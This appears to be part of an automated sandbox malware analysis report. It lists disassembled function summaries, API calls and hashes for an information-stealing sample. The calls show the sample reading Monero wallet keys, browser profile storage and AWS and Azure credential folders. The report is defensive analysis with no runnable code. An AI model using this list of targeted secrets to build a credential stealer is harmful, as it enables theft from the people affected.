                               • Associated: 00000001.00000002.2252112867.0000000000426000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252112867.000000000043F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252112867.00000000005C8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252296493.00000000005DA000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.0000000000758000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.000000000082D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.000000000085B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.0000000000863000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.0000000000872000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252692901.0000000000873000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252836077.0000000000A05000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252858896.0000000000A06000.00000080.00000001.01000000.00000003.sdmp
                               Joe Sandbox IDA Plugin
                               • Snapshot File: hcaresult_1_2_390000_file.jbxd
                               Similarity
                              • Opcode ID: 9e968847e894a7de8a0eaecdfcfc961017bb79b04f4d3ad5c2e935e5be1242d1
                              • Instruction ID: d5287c0eec4f0000547a5b847e1b8fde5456744be1d40ba9b10f72899c02599a
                              • Opcode Fuzzy Hash: 9e968847e894a7de8a0eaecdfcfc961017bb79b04f4d3ad5c2e935e5be1242d1
                              • Instruction Fuzzy Hash: 633116F3E192185FF3146E29DC45777BBD9EB94320F1A863DDB9493380E93A1C148296
                               Memory Dump Source
                               • Source File: 00000001.00000002.2252315569.00000000005DC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                               • Associated: 00000001.00000002.2252091636.0000000000390000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252112867.00000000003C7000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252112867.000000000041E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252112867.0000000000426000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252112867.000000000043F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252112867.00000000005C8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252296493.00000000005DA000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.0000000000758000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.000000000082D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.000000000085B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.0000000000863000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.0000000000872000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252692901.0000000000873000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252836077.0000000000A05000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252858896.0000000000A06000.00000080.00000001.01000000.00000003.sdmp
                               Joe Sandbox IDA Plugin
                               • Snapshot File: hcaresult_1_2_390000_file.jbxd
                               Similarity
                              • Opcode ID: 251fac4c3f79ddb8211a8796b5758c2ca7d15f8ee0860448886f50d57edda100
                              • Instruction ID: a81a08ae3b2a46990787632a4467201449b0be9e25814ab6a3bd17bd2e1e06d2
                              • Opcode Fuzzy Hash: 251fac4c3f79ddb8211a8796b5758c2ca7d15f8ee0860448886f50d57edda100
                              • Instruction Fuzzy Hash: FF31D3B3A086189FE3106E19DC857AAB7D1EF94324F1B493CDBD497340EA359C0586D6
                              APIs
                              • lstrlen.KERNEL32(00000000), ref: 003A8636
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A866D
                              • lstrcpy.KERNEL32(?,00000000), ref: 003A86AA
                              • StrStrA.SHLWAPI(?,00F2F208), ref: 003A86CF
                              • lstrcpyn.KERNEL32(005C93D0,?,00000000), ref: 003A86EE
                              • lstrlen.KERNEL32(?), ref: 003A8701
                              • wsprintfA.USER32 ref: 003A8711
                              • lstrcpy.KERNEL32(?,?), ref: 003A8727
                              • StrStrA.SHLWAPI(?,00F2F250), ref: 003A8754
                              • lstrcpy.KERNEL32(?,005C93D0), ref: 003A87B4
                              • StrStrA.SHLWAPI(?,00F2F6A0), ref: 003A87E1
                              • lstrcpyn.KERNEL32(005C93D0,?,00000000), ref: 003A8800
                              Strings
                               Memory Dump Source
                               • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                               • Associated: 00000001.00000002.2252091636.0000000000390000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252112867.00000000003C7000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252112867.000000000041E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252112867.0000000000426000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252112867.000000000043F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252112867.00000000005C8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252296493.00000000005DA000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.00000000005DC000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.0000000000758000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.000000000082D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.000000000085B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.0000000000863000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.0000000000872000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252692901.0000000000873000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252836077.0000000000A05000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252858896.0000000000A06000.00000080.00000001.01000000.00000003.sdmp
                               Joe Sandbox IDA Plugin
                               • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Similarity
                              • API ID: lstrcpy$lstrcpynlstrlen$wsprintf
                              • String ID: %s%s
                              • API String ID: 2672039231-3252725368
                              • Opcode ID: 10207785f857b04fccb619df14b93f5de486f2a7e235c1575e46ec5bd5440cd5
                              • Instruction ID: 03472affe7267e2ab047268756401c95107bc31b0c1201204053414875f17438
                              • Opcode Fuzzy Hash: 10207785f857b04fccb619df14b93f5de486f2a7e235c1575e46ec5bd5440cd5
                              • Instruction Fuzzy Hash: 0CF18A72901914EFCB11DB64DC4CEEABBB9EF98700F154599E90AE7250DF34AE04DBA0
                              APIs
                              • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 00391F9F
                              • lstrlen.KERNEL32(00F28A28), ref: 00391FAE
                              • lstrcpy.KERNEL32(00000000,?), ref: 00391FDB
                              • lstrcat.KERNEL32(00000000,?), ref: 00391FE3
                              • lstrlen.KERNEL32(003C1794), ref: 00391FEE
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0039200E
                              • lstrcat.KERNEL32(00000000,003C1794), ref: 0039201A
                              • lstrcpy.KERNEL32(00000000,?), ref: 00392042
                              • lstrcat.KERNEL32(00000000,00000000), ref: 0039204D
                              • lstrlen.KERNEL32(003C1794), ref: 00392058
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00392075
                              • lstrcat.KERNEL32(00000000,003C1794), ref: 00392081
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003920AC
                              • lstrlen.KERNEL32(?), ref: 003920E4
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00392104
                              • lstrcat.KERNEL32(00000000,?), ref: 00392112
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00392139
                              • lstrlen.KERNEL32(003C1794), ref: 0039214B
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0039216B
                              • lstrcat.KERNEL32(00000000,003C1794), ref: 00392177
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0039219D
                              • lstrcat.KERNEL32(00000000,00000000), ref: 003921A8
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003921D4
                              • lstrlen.KERNEL32(?), ref: 003921EA
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0039220A
                              • lstrcat.KERNEL32(00000000,?), ref: 00392218
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00392242
                              • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 0039227F
                              • lstrlen.KERNEL32(00F2DB70), ref: 0039228D
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003922B1
                              • lstrcat.KERNEL32(00000000,00F2DB70), ref: 003922B9
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003922F7
                              • lstrcat.KERNEL32(00000000), ref: 00392304
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0039232D
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00392356
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00392382
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003923BF
                              • DeleteFileA.KERNEL32(00000000), ref: 003923F7
                              • FindNextFileA.KERNEL32(00000000,?), ref: 00392444
                              • FindClose.KERNEL32(00000000), ref: 00392453
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                              • Associated: 00000001.00000002.2252091636.0000000000390000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252112867.00000000003C7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252112867.000000000041E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252112867.0000000000426000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252112867.000000000043F000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252112867.00000000005C8000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252296493.00000000005DA000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252315569.00000000005DC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252315569.0000000000758000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252315569.000000000082D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252315569.000000000085B000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252315569.0000000000863000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252315569.0000000000872000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252692901.0000000000873000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252836077.0000000000A05000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252858896.0000000000A06000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcat$lstrlen$File$Find$CloseCopyDeleteNext
                              • String ID:
                              • API String ID: 2857443207-0
                              • Opcode ID: 686b69bb301db33f2d85faf8815b1d22918a3ea316c91b6261cd50fe22667137
                              • Instruction ID: bba002bf48f904ab308eb435ee1a42b1797e84568372b59ff6f86191c2871f1a
                              • Opcode Fuzzy Hash: 686b69bb301db33f2d85faf8815b1d22918a3ea316c91b6261cd50fe22667137
                              • Instruction Fuzzy Hash: 3EE12C31A12A1AAFCF22EF64DD89EAF77B9AF14300F054164F805AB211DB34DD15CBA4
                              APIs
                              • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003A6445
                              • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003A6480
                              • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 003A64AA
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A64E1
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A6506
                              • lstrcat.KERNEL32(00000000,00000000), ref: 003A650E
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A6537
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                              • Associated: 00000001.00000002.2252091636.0000000000390000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252112867.00000000003C7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252112867.000000000041E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252112867.0000000000426000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252112867.000000000043F000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252112867.00000000005C8000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252296493.00000000005DA000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252315569.00000000005DC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252315569.0000000000758000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252315569.000000000082D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252315569.000000000085B000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252315569.0000000000863000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252315569.0000000000872000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252692901.0000000000873000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252836077.0000000000A05000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252858896.0000000000A06000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$FolderPathlstrcat
                              • String ID: \..\
                              • API String ID: 2938889746-4220915743
                              • Opcode ID: ae73a325043e89da3d9501e29da5395ee789cf0b0079fe6b64dfcf792ebca7a7
                              • Instruction ID: e1de29a1f503c60b47dce7f607f165c02dc45e4ff2b8c993a57543d61ca1aede
                              • Opcode Fuzzy Hash: ae73a325043e89da3d9501e29da5395ee789cf0b0079fe6b64dfcf792ebca7a7
                              • Instruction Fuzzy Hash: 21F19D71D11A06AFCB23AF69D84AAAF77B8EF45300F094168F855DB251DB38DC45CB90
                              APIs
                              • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003A43A3
                              • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003A43D6
                              • lstrcpy.KERNEL32(00000000,?), ref: 003A43FE
                              • lstrcat.KERNEL32(00000000,00000000), ref: 003A4409
                              • lstrlen.KERNEL32(\storage\default\), ref: 003A4414
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A4431
                              • lstrcat.KERNEL32(00000000,\storage\default\), ref: 003A443D
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A4466
                              • lstrcat.KERNEL32(00000000,00000000), ref: 003A4471
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A4498
                              • lstrcpy.KERNEL32(00000000,?), ref: 003A44D7
                              • lstrcat.KERNEL32(00000000,?), ref: 003A44DF
                              • lstrlen.KERNEL32(003C1794), ref: 003A44EA
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A4507
                              • lstrcat.KERNEL32(00000000,003C1794), ref: 003A4513
                              • lstrlen.KERNEL32(.metadata-v2), ref: 003A451E
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A453B
                              • lstrcat.KERNEL32(00000000,.metadata-v2), ref: 003A4547
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A456E
                              • lstrcpy.KERNEL32(00000000,?), ref: 003A45A0
                              • GetFileAttributesA.KERNEL32(00000000), ref: 003A45A7
                              • lstrcpy.KERNEL32(00000000,?), ref: 003A4601
                              • lstrcpy.KERNEL32(00000000,?), ref: 003A462A
                              • lstrcpy.KERNEL32(00000000,?), ref: 003A4653
                              • lstrcpy.KERNEL32(00000000,?), ref: 003A467B
                              • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003A46AF
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                              • Associated: 00000001.00000002.2252091636.0000000000390000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252112867.00000000003C7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252112867.000000000041E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252112867.0000000000426000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252112867.000000000043F000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252112867.00000000005C8000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252296493.00000000005DA000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252315569.00000000005DC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252315569.0000000000758000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252315569.000000000082D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252315569.000000000085B000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252315569.0000000000863000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252315569.0000000000872000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252692901.0000000000873000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252836077.0000000000A05000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252858896.0000000000A06000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcat$lstrlen$AttributesFile
                              • String ID: .metadata-v2$\storage\default\
                              • API String ID: 1033685851-762053450
                              • Opcode ID: 988ff3f0d161dc792a259c459f6b2c0352799c25ff8f166453647ccb9986862b
                              • Instruction ID: b612fca88207ac1939a204a2fd522381a26d070bccf18edf98686be410cce8ee
                              • Opcode Fuzzy Hash: 988ff3f0d161dc792a259c459f6b2c0352799c25ff8f166453647ccb9986862b
                              • Instruction Fuzzy Hash: E7B16D31A12A06AFCF23EF75D94AAAF77A8EF56300F051128F845EB251DB74DC158B90
                              APIs
                              • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003A57D5
                              • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 003A5804
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A5835
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A585D
                              • lstrcat.KERNEL32(00000000,00000000), ref: 003A5868
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A5890
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A58C8
                              • lstrcat.KERNEL32(00000000,00000000), ref: 003A58D3
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A58F8
                              • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003A592E
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A5956
                              • lstrcat.KERNEL32(00000000,00000000), ref: 003A5961
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A5988
                              • lstrlen.KERNEL32(003C1794), ref: 003A599A
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A59B9
                              • lstrcat.KERNEL32(00000000,003C1794), ref: 003A59C5
                              • lstrlen.KERNEL32(00F2DA98), ref: 003A59D4
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A59F7
                              • lstrcat.KERNEL32(00000000,00000000), ref: 003A5A02
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A5A2C
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A5A58
                              • GetFileAttributesA.KERNEL32(00000000), ref: 003A5A5F
                              • lstrcpy.KERNEL32(00000000,?), ref: 003A5AB7
                              • lstrcpy.KERNEL32(00000000,?), ref: 003A5B2D
                              • lstrcpy.KERNEL32(00000000,?), ref: 003A5B56
                              • lstrcpy.KERNEL32(00000000,?), ref: 003A5B89
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A5BB5
                              • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003A5BEF
                              • lstrcpy.KERNEL32(00000000,?), ref: 003A5C4C
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A5C70
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                              • Associated: 00000001.00000002.2252091636.0000000000390000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252112867.00000000003C7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252112867.000000000041E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252112867.0000000000426000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252112867.000000000043F000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252112867.00000000005C8000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252296493.00000000005DA000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252315569.00000000005DC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252315569.0000000000758000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252315569.000000000082D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252315569.000000000085B000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252315569.0000000000863000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252315569.0000000000872000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252692901.0000000000873000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252836077.0000000000A05000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252858896.0000000000A06000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcat$lstrlen$AttributesFileFolderPath
                              • String ID:
                              • API String ID: 2428362635-0
                              • Opcode ID: 3107ff301a916e4ffb7860e56a89d93a99c926740e83ef3df026faa32331353f
                              • Instruction ID: 4c59041c4428abdc6e766f7c102fad1528d5a9b7ae12e82c977884c95f4025f1
                              • Opcode Fuzzy Hash: 3107ff301a916e4ffb7860e56a89d93a99c926740e83ef3df026faa32331353f
                              • Instruction Fuzzy Hash: 89029071A12A06AFCB23EF68D889AAF77B9EF55300F054128F845EB251DB34DD45CB90
                              APIs
                                • Part of subcall function 00391120: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00391135
                                • Part of subcall function 00391120: RtlAllocateHeap.NTDLL(00000000), ref: 0039113C
                                • Part of subcall function 00391120: RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,?), ref: 00391159
                                • Part of subcall function 00391120: RegQueryValueExA.ADVAPI32(?,wallet_path,00000000,00000000,00000000,000000FF), ref: 00391173
                                • Part of subcall function 00391120: RegCloseKey.ADVAPI32(?), ref: 0039117D
                              • lstrcat.KERNEL32(?,00000000), ref: 003911C0
                              • lstrlen.KERNEL32(?), ref: 003911CD
                              • lstrcat.KERNEL32(?,.keys), ref: 003911E8
                              • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 0039121F
                              • lstrlen.KERNEL32(00F28A28), ref: 0039122D
                              • lstrcpy.KERNEL32(00000000,?), ref: 00391251
                              • lstrcat.KERNEL32(00000000,00F28A28), ref: 00391259
                              • lstrlen.KERNEL32(\Monero\wallet.keys), ref: 00391264
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00391288
                              • lstrcat.KERNEL32(00000000,\Monero\wallet.keys), ref: 00391294
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003912BA
                              • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003912FF
                              • lstrlen.KERNEL32(00F2DB70), ref: 0039130E
                              • lstrcpy.KERNEL32(00000000,?), ref: 00391335
                              • lstrcat.KERNEL32(00000000,?), ref: 0039133D
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00391378
                              • lstrcat.KERNEL32(00000000), ref: 00391385
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003913AC
                              • CopyFileA.KERNEL32(?,?,00000001), ref: 003913D5
                              • lstrcpy.KERNEL32(00000000,?), ref: 00391401
                              • lstrcpy.KERNEL32(00000000,?), ref: 0039143D
                                • Part of subcall function 003AEDE0: lstrcpy.KERNEL32(00000000,?), ref: 003AEE12
                              • DeleteFileA.KERNEL32(?), ref: 00391471
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                              • Associated: 00000001.00000002.2252091636.0000000000390000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252112867.00000000003C7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252112867.000000000041E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252112867.0000000000426000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252112867.000000000043F000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252112867.00000000005C8000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252296493.00000000005DA000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252315569.00000000005DC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252315569.0000000000758000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252315569.000000000082D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252315569.000000000085B000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252315569.0000000000863000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252315569.0000000000872000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252692901.0000000000873000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252836077.0000000000A05000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.2252858896.0000000000A06000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcat$lstrlen$FileHeap$AllocateCloseCopyDeleteOpenProcessQueryValue
                              • String ID: .keys$\Monero\wallet.keys
                              • API String ID: 2881711868-3586502688
                              • Opcode ID: ea188cdadf7e6a9a73c2dcfe4e7435274cdd9d632100bc0ec4254136ac5a36a5
                              • Instruction ID: debb716ded5de695941ccafe509066239b9efd5b92d674e4b81c90fc4a70a87b
                              • Opcode Fuzzy Hash: ea188cdadf7e6a9a73c2dcfe4e7435274cdd9d632100bc0ec4254136ac5a36a5
                              • Instruction Fuzzy Hash: 07A17E72A11A06ABCF22EFA4DC8AEAF77B9AF54300F050464F945EB251DB30DD15CB94
                              APIs
                              • memset.MSVCRT ref: 003AE740
                              • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 003AE769
                              • lstrcpy.KERNEL32(00000000,?), ref: 003AE79F
                              • lstrcat.KERNEL32(?,00000000), ref: 003AE7AD
                              • lstrcat.KERNEL32(?,\.azure\), ref: 003AE7C6
                              • memset.MSVCRT ref: 003AE805
                              • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 003AE82D
                              • lstrcpy.KERNEL32(00000000,?), ref: 003AE85F
                              • lstrcat.KERNEL32(?,00000000), ref: 003AE86D
                              • lstrcat.KERNEL32(?,\.aws\), ref: 003AE886
                              • memset.MSVCRT ref: 003AE8C5
                              • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 003AE8F1
                              • lstrcpy.KERNEL32(00000000,?), ref: 003AE920
                              • lstrcat.KERNEL32(?,00000000), ref: 003AE92E
                              • lstrcat.KERNEL32(?,\.IdentityService\), ref: 003AE947
                              • memset.MSVCRT ref: 003AE986
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
